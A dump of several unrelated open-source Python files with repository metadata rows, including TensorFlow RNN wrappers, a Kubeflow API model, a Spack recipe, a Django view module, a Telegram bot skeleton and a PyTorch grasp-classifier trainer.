if (not isinstance(self._input_keep_prob, numbers.Real) or
self._input_keep_prob < 1.0):
if input_size is None:
raise ValueError(
"When variational_recurrent=True and input_keep_prob < 1.0 or "
"is unknown, input_size must be provided")
self._recurrent_input_noise = _enumerated_map_structure(
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("input", i)),
input_size)
self._recurrent_state_noise = _enumerated_map_structure(
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("state", i)),
cell.state_size)
self._recurrent_output_noise = _enumerated_map_structure(
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("output", i)),
cell.output_size)
def _gen_seed(self, salt_prefix, index):
if self._seed is None:
return None
salt = "%s_%d" % (salt_prefix, index)
string = (str(self._seed) + salt).encode("utf-8")
return int(hashlib.md5(string).hexdigest()[:8], 16) & 0x7FFFFFFF
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def zero_state(self, batch_size, dtype):
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
return self._cell.zero_state(batch_size, dtype)
def _variational_recurrent_dropout_value(
self, index, value, noise, keep_prob):
"""Performs dropout given the pre-calculated noise tensor."""
# uniform [keep_prob, 1.0 + keep_prob)
random_tensor = keep_prob + noise
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = math_ops.floor(random_tensor)
ret = math_ops.div(value, keep_prob) * binary_tensor
ret.set_shape(value.get_shape())
return ret
def _dropout(self, values, salt_prefix, recurrent_noise, keep_prob):
"""Decides whether to perform standard dropout or recurrent dropout."""
if not self._variational_recurrent:
def dropout(i, v):
return nn_ops.dropout(
v, keep_prob=keep_prob, seed=self._gen_seed(salt_prefix, i))
return _enumerated_map_structure(dropout, values)
else:
def dropout(i, v, n):
return self._variational_recurrent_dropout_value(i, v, n, keep_prob)
return _enumerated_map_structure(dropout, values, recurrent_noise)
def __call__(self, inputs, state, scope=None):
"""Run the cell with the declared dropouts."""
def _should_dropout(p):
return (not isinstance(p, float)) or p < 1
if _should_dropout(self._input_keep_prob):
inputs = self._dropout(inputs, "input",
self._recurrent_input_noise,
self._input_keep_prob)
output, new_state = self._cell(inputs, state, scope)
if _should_dropout(self._state_keep_prob):
new_state = self._dropout(new_state, "state",
self._recurrent_state_noise,
self._state_keep_prob)
if _should_dropout(self._output_keep_prob):
output = self._dropout(output, "output",
self._recurrent_output_noise,
self._output_keep_prob)
return output, new_state
class ResidualWrapper(RNNCell):
"""RNNCell wrapper that ensures cell inputs are added to the outputs."""
def __init__(self, cell):
"""Constructs a `ResidualWrapper` for `cell`.
Args:
cell: An instance of `RNNCell`.
"""
self._cell = cell
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def zero_state(self, batch_size, dtype):
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
return self._cell.zero_state(batch_size, dtype)
def __call__(self, inputs, state, scope=None):
"""Run the cell and add its inputs to its outputs.
Args:
inputs: cell inputs.
state: cell state.
scope: optional cell scope.
Returns:
Tuple of cell outputs and new state.
Raises:
TypeError: If cell inputs and outputs have different structure (type).
ValueError: If cell inputs and outputs have different structure (value).
"""
outputs, new_state = self._cell(inputs, state, scope=scope)
nest.assert_same_structure(inputs, outputs)
# Ensure shapes match
def assert_shape_match(inp, out):
inp.get_shape().assert_is_compatible_with(out.get_shape())
nest.map_structure(assert_shape_match, inputs, outputs)
res_outputs = nest.map_structure(
lambda inp, out: inp + out, inputs, outputs)
return (res_outputs, new_state)
class DeviceWrapper(RNNCell):
"""Operator that ensures an RNNCell runs on a particular device."""
def __init__(self, cell, device):
"""Construct a `DeviceWrapper` for `cell` with device `device`.
Ensures the wrapped `cell` is called with `tf.device(device)`.
Args:
cell: An instance of `RNNCell`.
device: A device string or function, for passing to `tf.device`.
"""
self._cell = cell
self._device = device
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def zero_state(self, batch_size, dtype):
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
with ops.device(self._device):
return self._cell.zero_state(batch_size, dtype)
def __call__(self, inputs, state, scope=None):
"""Run the cell on specified device."""
with ops.device(self._device):
return self._cell(inputs, state, scope=scope)
class MultiRNNCell(RNNCell):
"""RNN cell composed sequentially of multiple simple cells."""
def __init__(self, cells, state_is_tuple=True):
"""Create a RNN cell composed sequentially of a number of RNNCells.
Args:
cells: list of RNNCells that will be composed in this order.
state_is_tuple: If True, accepted and returned states are n-tuples, where
`n = len(cells)`. If False, the states are all
concatenated along the column axis. This latter behavior will soon be
deprecated.
Raises:
ValueError: if cells is empty (not allowed), or at least one of the cells
returns a state tuple but the flag `state_is_tuple` is `False`.
"""
super(MultiRNNCell, self).__init__()
if not cells:
raise ValueError("Must specify at least one cell for MultiRNNCell.")
if not nest.is_sequence(cells):
raise TypeError(
"cells must be a list or tuple, but saw: %s." % cells)
self._cells = cells
self._state_is_tuple = state_is_tuple
if not state_is_tuple:
if any(nest.is_sequence(c.state_size) for c in self._cells):
raise ValueError("Some cells return tuples of states, but the flag "
"state_is_tuple is not set. State sizes are: %s"
% str([c.state_size for c in self._cells]))
@property
def state_size(self):
if self._state_is_tuple:
return tuple(cell.state_size for cell in self._cells)
else:
return sum([cell.state_size for cell in self._cells])
@property
def output_size(self):
return self._cells[-1].output_size
def zero_state(self, batch_size, dtype):
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
if self._state_is_tuple:
return tuple(cell.zero_state(batch_size, dtype) for cell in self._cells)
else:
# We know here that state_size of each cell is not a tuple and
# presumably does not contain TensorArrays or anything else fancy
return super(MultiRNNCell, self).zero_state(batch_size, dtype)
def call(self, inputs, state):
"""Run this multi-layer cell on inputs, starting from state."""
cur_state_pos = 0
cur_inp = inputs
new_states = []
for i, cell in enumerate(self._cells):
with vs.variable_scope("cell_%d" % i):
if self._state_is_tuple:
if not nest.is_sequence(state):
raise ValueError(
"Expected state to be a tuple of length %d, but received: %s" %
(len(self.state_size), state))
cur_state = state[i]
else:
cur_state = array_ops.slice(state, [0, cur_state_pos],
[-1, cell.state_size])
cur_state_pos += cell.state_size
cur_inp, new_state = cell(cur_inp, cur_state)
new_states.append(new_state)
new_states = (tuple(new_states) if self._state_is_tuple else
array_ops.concat(new_states, 1))
return cur_inp, new_states
class _SlimRNNCell(RNNCell):
"""A simple wrapper for slim.rnn_cells."""
def __init__(self, cell_fn):
"""Create a SlimRNNCell from a cell_fn.
Args:
cell_fn: a function which takes (inputs, state, scope) and produces the
outputs and the new_state. Additionally when called with inputs=None and
state=None it should return (initial_outputs, initial_state).
Raises:
TypeError: if cell_fn is not callable
ValueError: if cell_fn cannot produce a valid initial state.
"""
if not callable(cell_fn):
raise TypeError("cell_fn %s needs to be callable", cell_fn)
self._cell_fn = cell_fn
self._cell_name = cell_fn.func.__name__
init_output, init_state = self._cell_fn(None, None)
output_shape = init_output.get_shape()
state_shape = init_state.get_shape()
self._output_size = output_shape.with_rank(2)[1].value
self._state_size = state_shape.with_rank(2)[1].value
if self._output_size is None:
raise ValueError("Initial output created by %s has invalid shape %s" %
(self._cell_name, output_shape))
if self._state_size is None:
raise ValueError("Initial state created by %s has invalid shape %s" %
(self._cell_name, state_shape))
@property
def state_size(self):
return self._state_size
@property
def output_size(self):
return self._output_size
def __call__(self, inputs, state, scope=None):
scope = scope or self._cell_name
output, state = self._cell_fn(inputs, state, scope=scope)
return output, state
def _linear(args,
output_size,
bias,
bias_initializer=None,
kernel_initializer=None):
"""Linear map: sum_i(args[i] * W[i]), where W[i] is a variable.
Args:
args: a 2D Tensor or a list of 2D, batch x n, Tensors.
output_size: int, second dimension of W[i].
bias: boolean, whether to add a bias term or not.
bias_initializer: starting value to initialize the bias
(default is all zeros).
kernel_initializer: starting value to initialize the weight.
Returns:
A 2D Tensor with shape [batch x output_size] equal to
sum_i(args[i] * W[i]), where W[i]s are newly created matrices.
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
if args is None or (nest.is_sequence(args) and not args):
raise ValueError("`args` must be specified")
if not nest.is_sequence(args):
args = [args]
# Calculate the total size of arguments on dimension 1.
total_arg_size = 0
shapes = [a.get_shape() for a in args]
for shape in shapes:
if shape.ndims != 2:
raise ValueError("linear is expecting 2D arguments: %s" % shapes)
if shape[1].value is None:
raise ValueError("linear expects shape[1] to be provided for shape %s, "
"but saw %s" % (shape, shape[1]))
else:
total_arg_size += shape[1].value
dtype = [a.dtype for a in args][0]
# Now the computation.
scope = vs.get_variable_scope()
with vs.variable_scope(scope) as outer_scope:
weights = vs.get_variable(
_WEIGHTS_VARIABLE_NAME, [total_arg_size, output_size],
dtype=dtype,
initializer=kernel_initializer)
if len(args) == 1:
res = math_ops.matmul(args[0], weights)
else:
res = math_ops.matmul(array_ops.concat(args, 1), weights)
if not bias:
return res
with vs.variable_scope(outer_scope) as inner_scope:
inner_scope.set_partitioner(None)
if bias_initializer is None:
bias_initializer = init_ops.constant_initializer(0.0, dtype=dtype)
biases = vs.get_variable(
_BIAS_VARIABLE_NAME, [output_size],
dtype=dtype,
initializer=bias_initializer)
return nn_ops.bias_add(res, biases)
| 38.618587
| 80
| 0.67869
|
f3b811259dbb33b3cd8e5587c98111771a606b28
| 1,772
|
py
|
Python
|
test/test_ezsignfolder_create_object_v2_response.py
|
ezmaxinc/eZmax-SDK-python
|
6794b8001abfb7d9ae18a3b87aba164839b925a0
|
[
"MIT"
] | null | null | null |
test/test_ezsignfolder_create_object_v2_response.py
|
ezmaxinc/eZmax-SDK-python
|
6794b8001abfb7d9ae18a3b87aba164839b925a0
|
[
"MIT"
] | null | null | null |
test/test_ezsignfolder_create_object_v2_response.py
|
ezmaxinc/eZmax-SDK-python
|
6794b8001abfb7d9ae18a3b87aba164839b925a0
|
[
"MIT"
] | null | null | null |
"""
eZmax API Definition (Full)
    This API exposes all the functionalities for the eZmax and eZsign applications.  # noqa: E501
The version of the OpenAPI document: 1.1.7
Contact: support-api@ezmax.ca
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import eZmaxApi
from eZmaxApi.model.common_response import CommonResponse
from eZmaxApi.model.common_response_obj_debug import CommonResponseObjDebug
from eZmaxApi.model.common_response_obj_debug_payload import CommonResponseObjDebugPayload
from eZmaxApi.model.ezsignfolder_create_object_v2_response_all_of import EzsignfolderCreateObjectV2ResponseAllOf
from eZmaxApi.model.ezsignfolder_create_object_v2_response_m_payload import EzsignfolderCreateObjectV2ResponseMPayload
globals()['CommonResponse'] = CommonResponse
globals()['CommonResponseObjDebug'] = CommonResponseObjDebug
globals()['CommonResponseObjDebugPayload'] = CommonResponseObjDebugPayload
globals()['EzsignfolderCreateObjectV2ResponseAllOf'] = EzsignfolderCreateObjectV2ResponseAllOf
globals()['EzsignfolderCreateObjectV2ResponseMPayload'] = EzsignfolderCreateObjectV2ResponseMPayload
from eZmaxApi.model.ezsignfolder_create_object_v2_response import EzsignfolderCreateObjectV2Response
class TestEzsignfolderCreateObjectV2Response(unittest.TestCase):
"""EzsignfolderCreateObjectV2Response unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testEzsignfolderCreateObjectV2Response(self):
"""Test EzsignfolderCreateObjectV2Response"""
# FIXME: construct object with mandatory attributes with example values
# model = EzsignfolderCreateObjectV2Response() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 37.702128
| 118
| 0.813205
|
62213a32f7d6e3af24125276dea70501044d88cb
| 5,059
|
py
|
Python
|
backend/api/python_http_client/kfp_server_api/models/api_pipeline_runtime.py
|
Iuiu1234/pipelines
|
1e032f550ce23cd40bfb6827b995248537b07d08
|
[
"Apache-2.0"
] | 2,860
|
2018-05-24T04:55:01.000Z
|
2022-03-31T13:49:56.000Z
|
backend/api/python_http_client/kfp_server_api/models/api_pipeline_runtime.py
|
Iuiu1234/pipelines
|
1e032f550ce23cd40bfb6827b995248537b07d08
|
[
"Apache-2.0"
] | 7,331
|
2018-05-16T09:03:26.000Z
|
2022-03-31T23:22:04.000Z
|
backend/api/python_http_client/kfp_server_api/models/api_pipeline_runtime.py
|
Iuiu1234/pipelines
|
1e032f550ce23cd40bfb6827b995248537b07d08
|
[
"Apache-2.0"
] | 1,359
|
2018-05-15T11:05:41.000Z
|
2022-03-31T09:42:09.000Z
|
# coding: utf-8
"""
Kubeflow Pipelines API
This file contains REST API specification for Kubeflow Pipelines. The file is autogenerated from the swagger definition.
Contact: kubeflow-pipelines@google.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kfp_server_api.configuration import Configuration
class ApiPipelineRuntime(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'pipeline_manifest': 'str',
'workflow_manifest': 'str'
}
attribute_map = {
'pipeline_manifest': 'pipeline_manifest',
'workflow_manifest': 'workflow_manifest'
}
def __init__(self, pipeline_manifest=None, workflow_manifest=None, local_vars_configuration=None): # noqa: E501
"""ApiPipelineRuntime - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._pipeline_manifest = None
self._workflow_manifest = None
self.discriminator = None
if pipeline_manifest is not None:
self.pipeline_manifest = pipeline_manifest
if workflow_manifest is not None:
self.workflow_manifest = workflow_manifest
@property
def pipeline_manifest(self):
"""Gets the pipeline_manifest of this ApiPipelineRuntime. # noqa: E501
        Output. The runtime JSON manifest of the pipeline, including the status of pipeline steps and fields needed for UI visualization etc.  # noqa: E501
:return: The pipeline_manifest of this ApiPipelineRuntime. # noqa: E501
:rtype: str
"""
return self._pipeline_manifest
@pipeline_manifest.setter
def pipeline_manifest(self, pipeline_manifest):
"""Sets the pipeline_manifest of this ApiPipelineRuntime.
        Output. The runtime JSON manifest of the pipeline, including the status of pipeline steps and fields needed for UI visualization etc.  # noqa: E501
:param pipeline_manifest: The pipeline_manifest of this ApiPipelineRuntime. # noqa: E501
:type pipeline_manifest: str
"""
self._pipeline_manifest = pipeline_manifest
@property
def workflow_manifest(self):
"""Gets the workflow_manifest of this ApiPipelineRuntime. # noqa: E501
Output. The runtime JSON manifest of the argo workflow. This is deprecated after pipeline_runtime_manifest is in use. # noqa: E501
:return: The workflow_manifest of this ApiPipelineRuntime. # noqa: E501
:rtype: str
"""
return self._workflow_manifest
@workflow_manifest.setter
def workflow_manifest(self, workflow_manifest):
"""Sets the workflow_manifest of this ApiPipelineRuntime.
Output. The runtime JSON manifest of the argo workflow. This is deprecated after pipeline_runtime_manifest is in use. # noqa: E501
:param workflow_manifest: The workflow_manifest of this ApiPipelineRuntime. # noqa: E501
:type workflow_manifest: str
"""
self._workflow_manifest = workflow_manifest
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiPipelineRuntime):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ApiPipelineRuntime):
return True
return self.to_dict() != other.to_dict()
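# Hedged usage sketch (the manifest content below is illustrative):
#
#   runtime = ApiPipelineRuntime(workflow_manifest='{"kind": "Workflow"}')
#   runtime.to_dict()
#   # -> {'pipeline_manifest': None, 'workflow_manifest': '{"kind": "Workflow"}'}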
| 33.503311
| 153
| 0.638268
|
437dc879e8034c5dbe420c44e159c2202a0167bb
| 469
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/_bgcolorsrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 76
|
2020-07-06T14:44:05.000Z
|
2022-02-14T15:30:21.000Z
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/_bgcolorsrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-08-09T02:30:14.000Z
|
2022-03-12T00:50:14.000Z
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/_bgcolorsrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-07-12T16:18:07.000Z
|
2022-02-05T16:48:35.000Z
|
import _plotly_utils.basevalidators
class BgcolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="bgcolorsrc", parent_name="cone.hoverlabel", **kwargs
):
super(BgcolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
| 31.266667
| 79
| 0.641791
|
05bd6f2d1b5e9b2f961020bac59b10441bf13da9
| 515
|
py
|
Python
|
bot.py
|
Exganza/TelBot-init
|
aba70d10e2f326cd74943826db7122444d078c0f
|
[
"MIT"
] | null | null | null |
bot.py
|
Exganza/TelBot-init
|
aba70d10e2f326cd74943826db7122444d078c0f
|
[
"MIT"
] | null | null | null |
bot.py
|
Exganza/TelBot-init
|
aba70d10e2f326cd74943826db7122444d078c0f
|
[
"MIT"
] | null | null | null |
import telebot
import time
# API_TOKEN
bot_token = '*******************************'
bot = telebot.TeleBot(token=bot_token)
@bot.message_handler(commands=['start'])
def send_welcome(message):
pass
@bot.message_handler(commands=['help'])
def send_help(message):  # renamed: was a second "send_welcome", shadowing the /start handler above
pass
# Handle normal messages
@bot.message_handler(func=lambda msg: msg.text is not None)
def at_bot(message):
text = message.text
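    # Stub for now: the incoming text is captured but not acted on; an echo
    # reply could look like (illustrative): bot.reply_to(message, text)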
while True:
try:
bot.polling()
except Exception:
time.sleep(15)
| 17.758621
| 59
| 0.642718

hexsha: 782f0f859e8e23374f1fdaff5f7ad9a9917ad4a2 | size: 618 | ext: py | lang: Python
max_stars:  path balance/views.py | repo dagolap/liquidator-backend | head 542470db6a0169533f402c9f82ae4d9dd7f47b23 | licenses ["MIT"] | count null | events null to null
max_issues: path balance/views.py | repo dagolap/liquidator-backend | head 542470db6a0169533f402c9f82ae4d9dd7f47b23 | licenses ["MIT"] | count null | events null to null
max_forks:  path balance/views.py | repo dagolap/liquidator-backend | head 542470db6a0169533f402c9f82ae4d9dd7f47b23 | licenses ["MIT"] | count null | events null to null
from base.views import RetrieveCreateUpdateDestroyView, ByDateRangeView, RetrieveView
from base.mixins import CompanyFilterMixin
from .models import BankBalance
from .serializers import BankBalanceSerializer
class BankBalanceMixin(CompanyFilterMixin):
lookup_field = 'id'
queryset = BankBalance.objects.all()
serializer_class = BankBalanceSerializer
class BankBalanceView(BankBalanceMixin, RetrieveCreateUpdateDestroyView):
pass
class BankBalanceByDateView(BankBalanceMixin, RetrieveView):
lookup_field = 'date'
class BankBalanceByDateRangeView(BankBalanceMixin, ByDateRangeView):
pass
avg_line_length: 26.869565 | max_line_length: 85 | alphanum_fraction: 0.825243
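The class-based views in the record above still need URL routes before they are reachable. A hypothetical urls.py for the same app might look like the sketch below; the patterns and route names are assumptions, not taken from the liquidator-backend repository:

from django.urls import path

from .views import (
    BankBalanceView,
    BankBalanceByDateView,
    BankBalanceByDateRangeView,
)

# Hypothetical routing; the real project may wire these views differently.
urlpatterns = [
    path('bank-balances/<int:id>/', BankBalanceView.as_view(), name='bank-balance'),
    path('bank-balances/by-date/<str:date>/', BankBalanceByDateView.as_view(), name='bank-balance-by-date'),
    path('bank-balances/by-date-range/', BankBalanceByDateRangeView.as_view(), name='bank-balance-by-date-range'),
]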

hexsha: 71a570895559608007c55310e2ab5afb055181ac | size: 830 | ext: py | lang: Python
max_stars:  path var/spack/repos/builtin/packages/bitmap/package.py | repo whitfin/spack | head aabd2be31a511d0e00c1017f7311a421659319d9 | licenses ["ECL-2.0", "Apache-2.0", "MIT"] | count 3 | events 2019-06-27T13:26:50.000Z to 2019-07-01T16:24:54.000Z
max_issues: path var/spack/repos/builtin/packages/bitmap/package.py | repo openbiox/spack | head bb6ec7fb40c14b37e094a860e3625af53f633174 | licenses ["ECL-2.0", "Apache-2.0", "MIT"] | count 75 | events 2016-07-27T11:43:00.000Z to 2020-12-08T15:56:53.000Z
max_forks:  path var/spack/repos/builtin/packages/bitmap/package.py | repo openbiox/spack | head bb6ec7fb40c14b37e094a860e3625af53f633174 | licenses ["ECL-2.0", "Apache-2.0", "MIT"] | count 8 | events 2015-10-16T13:51:49.000Z to 2021-10-18T13:58:03.000Z
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Bitmap(AutotoolsPackage):
"""bitmap, bmtoa, atobm - X bitmap (XBM) editor and converter utilities."""
homepage = "http://cgit.freedesktop.org/xorg/app/bitmap"
url = "https://www.x.org/archive/individual/app/bitmap-1.0.8.tar.gz"
version('1.0.8', '0ca600041bb0836ae7c9f5db5ce09091')
depends_on('libx11')
depends_on('libxmu')
depends_on('libxaw')
depends_on('libxmu')
depends_on('libxt')
depends_on('xbitmaps', type='build')
depends_on('xproto@7.0.25:', type='build')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
avg_line_length: 30.740741 | max_line_length: 79 | alphanum_fraction: 0.692771
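The version() directive in the recipe above pairs the 1.0.8 tarball with an MD5 digest that Spack verifies after download. A standalone sketch of that kind of check; only the digest comes from the recipe, and the local filename is assumed:

import hashlib

EXPECTED_MD5 = "0ca600041bb0836ae7c9f5db5ce09091"  # digest from the recipe above


def md5_of(path, chunk_size=1 << 20):
    # Hash the file in chunks so a large tarball never has to fit in memory.
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


if __name__ == "__main__":
    # "bitmap-1.0.8.tar.gz" is an assumed local filename for the downloaded archive.
    print(md5_of("bitmap-1.0.8.tar.gz") == EXPECTED_MD5)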

hexsha: de00015354650ec88b78255ae55907962f625326 | size: 4,285 | ext: py | lang: Python
max_stars:  path trainer_grasp.py | repo wenbowen123/catgrasp | head 4b2f4016fc40e8aad1f157267c460ce333dec7ad | licenses ["Apache-2.0", "MIT"] | count 44 | events 2022-03-05T00:47:18.000Z to 2022-03-31T11:12:02.000Z
max_issues: path trainer_grasp.py | repo wenbowen123/catgrasp | head 4b2f4016fc40e8aad1f157267c460ce333dec7ad | licenses ["Apache-2.0", "MIT"] | count null | events null to null
max_forks:  path trainer_grasp.py | repo wenbowen123/catgrasp | head 4b2f4016fc40e8aad1f157267c460ce333dec7ad | licenses ["Apache-2.0", "MIT"] | count 9 | events 2022-03-22T08:02:10.000Z to 2022-03-28T10:49:06.000Z
import os.path
import numpy as np
import os,sys,copy,time,cv2,tqdm
from scipy.signal import convolve2d
code_dir = os.path.dirname(os.path.realpath(__file__))
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import StepLR
import torchvision
from PIL import Image
from dataset_grasp import *
from pointnet2 import *
class TrainerGrasp:
def __init__(self,cfg):
self.cfg = cfg
self.epoch = 0
self.best_train = 1e9
self.best_val = 1e9
self.train_data = GraspDataset(self.cfg,phase='train')
self.val_data = GraspDataset(self.cfg,phase='val')
self.train_loader = torch.utils.data.DataLoader(self.train_data, batch_size=self.cfg['batch_size'], shuffle=True, num_workers=self.cfg['n_workers'], pin_memory=False, drop_last=True,worker_init_fn=worker_init_fn)
self.val_loader = torch.utils.data.DataLoader(self.val_data, batch_size=self.cfg['batch_size'], shuffle=True, num_workers=self.cfg['n_workers'], pin_memory=False, drop_last=False,worker_init_fn=worker_init_fn)
self.model = PointNetCls(n_in=self.cfg['input_channel'],n_out=len(self.cfg['classes'])-1)
self.model = nn.DataParallel(self.model)
self.model.cuda()
start_lr = self.cfg['start_lr']/64*self.cfg['batch_size']
if self.cfg['optimizer_type']=='adam':
self.optimizer = optim.Adam(filter(lambda p: p.requires_grad, self.model.parameters()), lr=start_lr, weight_decay=self.cfg['weight_decay'], betas=(0.9, 0.99), amsgrad=False)
elif self.cfg['optimizer_type']=='sgd':
self.optimizer = optim.SGD(filter(lambda p: p.requires_grad, self.model.parameters()), lr=start_lr,weight_decay=self.cfg['weight_decay'], momentum=0.9)
self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=self.cfg['lr_milestones'], gamma=0.1)
def train_loop(self):
self.model.train()
avg_loss = []
for iter, batch in enumerate(self.train_loader):
input_data = batch['input'].cuda().float()
score = batch['score'].cuda().float()
pred, l4_points = self.model(input_data)
loss = nn.CrossEntropyLoss()(pred,score.long())
avg_loss.append(loss.item())
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if iter%max(1,len(self.train_loader)//10)==0:
print('epoch={}, {}/{}, train_loss={}'.format(self.epoch, iter, len(self.train_loader), loss.item()))
avg_loss = np.array(avg_loss).mean()
if avg_loss<self.best_train:
self.best_train = avg_loss
checkpoint_data = {'epoch': self.epoch, 'state_dict': self.model.state_dict(), 'best_res': self.best_train}
dir = "{}/best_train.pth.tar".format(self.cfg['save_dir'])
torch.save(checkpoint_data, dir,_use_new_zipfile_serialization=False)
def val_loop(self):
self.model.eval()
avg_loss = []
with torch.no_grad():
for iter,batch in enumerate(self.val_loader):
input_data = batch['input'].cuda().float()
score = batch['score'].cuda().float()
pred, l4_points = self.model(input_data)
loss = -(pred.argmax(dim=-1)==score).sum().float()/score.shape[0]
avg_loss.append(loss.item())
if iter%max(1,len(self.val_loader)//10)==0:
print('epoch={}, {}/{}, val_loss={}'.format(self.epoch,iter,len(self.val_loader),loss.item()))
avg_loss = np.array(avg_loss).mean()
if avg_loss<self.best_val:
self.best_val = avg_loss
checkpoint_data = {'epoch': self.epoch, 'state_dict': self.model.state_dict(), 'best_res': self.best_val}
dir = "{}/best_val.pth.tar".format(self.cfg['save_dir'])
torch.save(checkpoint_data, dir,_use_new_zipfile_serialization=False)
def train(self):
for self.epoch in range(self.cfg['n_epochs']):
np.random.seed(self.cfg['random_seed']+self.epoch)
print('epoch {}/{}'.format(self.epoch, self.cfg['n_epochs']))
begin = time.time()
self.train_loop()
print("train loop time: {} s".format(time.time()-begin))
print(">>>>>>>>>>>>>>>>>>>>")
begin = time.time()
self.val_loop()
print("val loop time: {} s".format(time.time()-begin))
print(">>>>>>>>>>>>>>>>>>>>")
self.scheduler.step()
avg_line_length: 36.939655 | max_line_length: 216 | alphanum_fraction: 0.676779
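The trainer in the record above follows a common PyTorch pattern: cross-entropy training, a cheaper validation metric (negative accuracy), and a checkpoint whenever the running best improves. A self-contained toy version of that loop, with a small dummy model and random tensors standing in for the PointNet classifier and the grasp dataset:

import torch
import torch.nn as nn
import torch.optim as optim

# Toy stand-ins: 16-dim inputs, 3 classes, random data instead of GraspDataset.
model = nn.Sequential(nn.Linear(16, 32), nn.ReLU(), nn.Linear(32, 3))
optimizer = optim.Adam(model.parameters(), lr=1e-3)
criterion = nn.CrossEntropyLoss()
best_val = float("inf")

for epoch in range(3):
    # Training step on one random batch.
    model.train()
    x, y = torch.randn(64, 16), torch.randint(0, 3, (64,))
    loss = criterion(model(x), y)
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()

    # Validation metric: negative accuracy, mirroring val_loop above.
    model.eval()
    with torch.no_grad():
        xv, yv = torch.randn(64, 16), torch.randint(0, 3, (64,))
        val_loss = -(model(xv).argmax(dim=-1) == yv).float().mean().item()

    # Checkpoint only when the best validation value improves.
    if val_loss < best_val:
        best_val = val_loss
        torch.save({"epoch": epoch, "state_dict": model.state_dict()}, "best_val.pth.tar")
    print(f"epoch={epoch} train_loss={loss.item():.3f} val_loss={val_loss:.3f}")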

hexsha: 0b3c1d04bb9c4412bce6f776ddba306f1328cd5c | size: 1,182 | ext: py | lang: Python
max_stars:  path bin/goodreadsquotes.py | repo shlomif/fortunes | head 41ba7913f1ec208c0d4264610fd78a50ac3cd4f2 | licenses ["Unlicense"] | count 18 | events 2019-07-27T04:49:54.000Z to 2022-02-26T18:23:55.000Z
max_issues: path bin/goodreadsquotes.py | repo JKirchartz/fortune | head 2e32ba0a57e3842dc06c8128d880ab4c8ec3aefc | licenses ["Unlicense"] | count 2 | events 2019-11-07T18:24:11.000Z to 2022-03-17T03:38:26.000Z
max_forks:  path bin/goodreadsquotes.py | repo JKirchartz/fortune | head 2e32ba0a57e3842dc06c8128d880ab4c8ec3aefc | licenses ["Unlicense"] | count 4 | events 2020-02-04T18:29:23.000Z to 2021-08-21T17:26:32.000Z
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyleft (ↄ) 2016 jkirchartz <me@jkirchartz.com>
#
# Distributed under terms of the NPL (Necessary Public License) license.
"""
Download all quotes from GoodReads by author's quote URL, print in fortune format
usage:
python goodreadsquotes.py https://www.goodreads.com/author/quotes/1791.Seth_Godin > godin
"""
from pyquery import PyQuery
import sys, random, re, time
